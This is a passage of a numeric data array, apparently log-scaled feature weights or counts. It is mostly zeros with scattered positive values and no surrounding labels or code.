0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 8.105134969404935, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.917171988845775, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.281419193361606, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 6.168389232050775, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.254681213103192, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 16.400167309572016, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.4825185607408002, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 